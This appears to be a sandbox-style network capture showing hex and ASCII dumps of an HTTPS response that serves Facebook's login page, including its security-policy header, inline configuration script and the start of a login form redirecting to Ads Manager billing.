                                                                                                                2022-10-13 11:08:02 UTC3771INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
                                                                                                                2022-10-13 11:08:02 UTC3773INData Raw: 32 61 61 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22
                                                                                                                Data Ascii: 2aad<!DOCTYPE html><html lang="en" id="facebook" class="
                                                                                                                2022-10-13 11:08:02 UTC3773INData Raw: 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 33 6e 48 67 69 61 52 77 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e 76 22 5d 2c 62 29 3a 28 77 69 6e 64 6f
                                                                                                                Data Ascii: no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(windo
                                                                                                                2022-10-13 11:08:02 UTC3774INData Raw: 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2f 77 65 62 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 62 2f 72 2f 68 4c 52 4a 31 47 47 5f 79 30 4a 2e 69 63 6f 22 20 2f 3e 3c 6c 69
                                                                                                                Data Ascii: anager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><li
                                                                                                                2022-10-13 11:08:02 UTC3776INData Raw: 5a 6b 31 38 79 4e 49 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 59 6f 32 55 7a 4f 68 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 72 2f 56 5f 77 4a 38 45 51 75 2d 76 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 5a 38 4a 2b 78 50 34 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 33 6e 48 67 69 61 52 77 22 3e 3c 2f
                                                                                                                Data Ascii: Zk18yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" crossorigin="anonymous" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Z8J+xP4" crossorigin="anonymous" nonce="3nHgiaRw"></
                                                                                                                2022-10-13 11:08:02 UTC3777INData Raw: 58 33 37 6f 51 63 6f 36 44 77 68 55 36 44 30 22 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 37 37 35 38 22 3a 7b 22 72 22 3a 31 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 53 65 72 76 65 72 4a 53 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 54 69 6d 65 53 6c 69 63 65 2c 53 65 72 76 65 72 4a 53 29 7b 28 6e 65 77 20 53 65 72 76 65 72 4a 53 28 29 29 2e 68 61 6e 64 6c 65 28 7b 22 64 65 66 69 6e 65 22 3a 5b 5b 22 55 52 4c 46 72 61 67 6d 65 6e 74 50 72 65 6c 75 64 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 68 61 73 68 74 61 67 52 65 64 69 72 65 63 74 22 3a 74 72 75 65 2c 22 66 72 61 67 42 6c 61 63 6b 6c 69 73 74 22 3a 5b 22 6e 6f 6e 63 65 22 2c 22 61 63 63 65 73 73 5f 74 6f 6b 65 6e 22 2c 22 6f 61 75 74
                                                                                                                Data Ascii: X37oQco6DwhU6D0"}},"qplData":{"7758":{"r":1}}})});requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oaut
                                                                                                                2022-10-13 11:08:02 UTC3779INData Raw: 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 7d 2c 38 32 37 5d 2c 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57
                                                                                                                Data Ascii: ,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":false},827],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_W
                                                                                                                2022-10-13 11:08:02 UTC3780INData Raw: 34 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 57 65 62 4b 69 74 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 22 35 33 37 2e 33 36 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69
                                                                                                                Data Ascii: 4,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmedi
                                                                                                                2022-10-13 11:08:02 UTC3781INData Raw: 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c 5f 41 43 43 4f 55 4e 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47
                                                                                                                Data Ascii: ","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G
                                                                                                                2022-10-13 11:08:02 UTC3783INData Raw: 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 22 2c 22 6e 69 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 54 72 75 73 74 65 64 54 79 70 65 73 43 6f 6e
                                                                                                                Data Ascii: h","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.com","nibio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["TrustedTypesCon
                                                                                                                2022-10-13 11:08:02 UTC3783INData Raw: 35 61 63 63 0d 0a 43 45 4c 4c 45 4e 54 22 7d 2c 34 37 30 35 5d 2c 5b 22 43 6f 6d 65 74 41 6c 74 70 61 79 4a 73 53 64 6b 49 66 72 61 6d 65 41 6c 6c 6f 77 65 64 44 6f 6d 61 69 6e 73 22 2c 5b 5d 2c 7b 22 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 69 76 65 2e 61 64 79 65 6e 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 6e 74 65 67 72 61 74 69 6f 6e 2d 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 2e 69 6e 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 70 61 79 75 6c 61 74 61 6d 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 65 63 75 72 65 2e 70 61 79 75 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 5c 2f 5c 2f 66 61 63 65 62 6f 6f 6b 2e 64 6c 6f 63 61 6c 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a
                                                                                                                Data Ascii: 5accCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:
                                                                                                                2022-10-13 11:08:02 UTC3785INData Raw: 77 72 69 74 65 5f 72 75 6c 65 73 22 3a 7b 7d 2c 22 77 68 69 74 65 6c 69 73 74 22 3a 7b 22 5c 2f 68 72 5c 2f 72 22 3a 31 2c 22 5c 2f 68 72 5c 2f 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 75 6e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61
                                                                                                                Data Ascii: write_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/priva
                                                                                                                2022-10-13 11:08:02 UTC3786INData Raw: 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 66 65 61 74 75 72 65 5f 73 77 69 74 63 68 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 63 61 72 72 69 65 72 5f 70 61 67 65 5c 2f 73 65 74 74 69 6e 67 73 5f 70 61 67 65 5c 2f 22 3a 31 2c 22 5c 2f 61 6c 6f 68 61 5f 63 68 65 63 6b 5f 62 75 69 6c 64 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 7a 62 64 5c 2f 73 6f 66 74 6e 75 64 67 65 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 61 66 5f 74 72 61 6e 73 69 74 69 6f 6e 5c 2f 61 63 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 7a 65 72 6f 5c 2f 66 72 65 65 6d 69 75 6d 5c 2f 22 3a 31
                                                                                                                Data Ascii: zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1
                                                                                                                2022-10-13 11:08:02 UTC3788INData Raw: 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6c 69 66 66 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 5c 2f 73 75 62 6d 69 74 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 63 6f 6e 66 69 72 6d 65 64 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 70 72 65 63 6f 6e 66 69 72 6d 61 74 69 6f 6e 5c 2f 63 6f 6e 74 61 63 74 70 6f 69 6e 74 5f 63 68 61 6e 67 65 5c 2f 22 3a 31 2c 22 5c 2f 68 65 6c 70 5c 2f 63 6f 6e 74 61 63 74 5c 2f 22 3a 31 2c 22 5c 2f 73 75 72 76 65 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c
                                                                                                                Data Ascii: contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/l
                                                                                                                2022-10-13 11:08:02 UTC3789INData Raw: 71 62 54 38 55 63 34 43 4b 70 76 47 4c 41 47 5a 36 45 53 75 45 37 68 4e 49 6e 6d 78 34 4b 52 43 58 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 31 37 38 32 32 22 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 2c 22 41 61 32 47 32 73 59 75 4d 6d 42 7a 4c 42 32 30 45 43 68 35 42 45 72 69 62 6b 62 7a 30 37 46 51 43 71 5a 47 7a 68 74 6e 6a 62 4c 48 47 72 59 70 4b 6b 47 73 79 30 58 33 54 71 62 54 38 55 63 34 43 4b 70 76 47 4c 41 47 5a 36 45 53 75 45 37 68 4e 49 6e 6d 78 34 4b 52 43 58 6b 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 30 36 36 39 36 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 42
                                                                                                                Data Ascii: qbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:717822",["TimeSliceImpl"],{"__rc":["TimeSliceImpl","Aa2G2sYuMmBzLB20ECh5BEribkbz07FQCqZGzhtnjbLHGrYpKkGsy0X3TqbT8Uc4CKpvGLAGZ6ESuE7hNInmx4KRCXk"]},-1],["cr:806696",["clearTimeoutBlue"],{"__rc":["clearTimeoutB
                                                                                                                2022-10-13 11:08:02 UTC3791INData Raw: 76 79 68 2d 37 76 46 76 65 68 77 58 6c 52 79 78 47 5f 54 69 63 62 77 36 36 63 54 6c 57 55 51 62 42 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 39 34 39 30 37 22 2c 5b 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 6e 75 6c 6c 2c 22 41 61 32 6f 42 4e 46 7a 57 30 6f 75 4b 61 71 6a 44 48 6c 51 6b 4d 5a 46 57 5f 6c 36 59 44 71 79 61 73 54 64 47 72 65 67 68 30 73 42 61 4f 78 4e 49 70 57 36 70 37 34 77 67 78 58 34 6b 6d 55 32 77 5a 77 59 36 79 37 61 72 55 54 74 78 73 37 55 62 53 6b 72 6a 62 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 45 76 65 6e 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 61 6d 70 6c 69 6e 67 22 3a 7b 22 62 61 6e 64 77 69 64 74 68 22 3a 30 2c 22 70 6c 61 79 22 3a 30 2c 22 70 6c 61 79 69 6e 67 22 3a 30 2c 22 70 72 6f 67 72 65 73 73 22 3a 30 2c 22 70 61 75 73 65 22 3a
                                                                                                                Data Ascii: vyh-7vFvehwXlRyxG_Ticbw66cTlWUQbB"]},-1],["cr:1094907",[],{"__rc":[null,"Aa2oBNFzW0ouKaqjDHlQkMZFW_l6YDqyasTdGregh0sBaOxNIpW6p74wgxX4kmU2wZwY6y7arUTtxs7UbSkrjbQ"]},-1],["EventConfig",[],{"sampling":{"bandwidth":0,"play":0,"playing":0,"progress":0,"pause":
                                                                                                                2022-10-13 11:08:02 UTC3792INData Raw: 63 65 22 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 5b 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 5d 2c 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 5d 2c 5b 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 56 69 73 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 2c 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f
                                                                                                                Data Ascii: ce"],["AsyncRequest"],["BanzaiScuba_DEPRECATED"],["VisualCompletionGating"],["FbtLogging"],["IntlQtEventFalcoEvent"],["RequireDeferredReference","unblock",[],[["AsyncRequest","BanzaiScuba_DEPRECATED","VisualCompletionGating","FbtLogging","IntlQtEventFalco
                                                                                                                2022-10-13 11:08:02 UTC3794INData Raw: 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 6c 6f 67 69 6e 2f 64 65 76 69 63 65 2d 62 61 73 65 64 2f 72 65 67 75 6c 61 72 2f 6c 6f 67 69 6e 2f 3f 6c 6f 67 69 6e 5f 61 74 74 65 6d 70 74 3d 31 26 61 6d 70 3b 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 61 6d 70 3b 6c 77 76 3d 31 30 30 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 6f 6e 73 75 62 6d 69 74 3d 22 22 3e
                                                                                                                Data Ascii: n></div><div class="login_form_container"><form id="login_form" action="/login/device-based/regular/login/?login_attempt=1&amp;next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;lwv=100" method="post" onsubmit="">
                                                                                                                2022-10-13 11:08:02 UTC3795INData Raw: 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 76 61 6c 75 65 3d 22 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 31 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 45 6d 61 69 6c 20 6f 72 20 70 68 6f 6e 65 20 6e 75 6d 62 65 72 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20 5f 35 34 36 36 20 5f 34 34 6d 67 22 3e 3c 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 35 35 72 31 20 5f 31 6b 62 74 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 74 65 78 74 20 5f 35 35 72 31 20 69 6e 70 75 74 74 65 78 74 20 5f 39 6e 70 69 20 69 6e 70 75 74
                                                                                                                Data Ascii: aceholder="Email or phone number" value="" autofocus="1" autocomplete="username" aria-label="Email or phone number" /></div><div class="clearfix _5466 _44mg"><div><div class="_55r1 _1kbt"><input type="password" class="inputtext _55r1 inputtext _9npi input
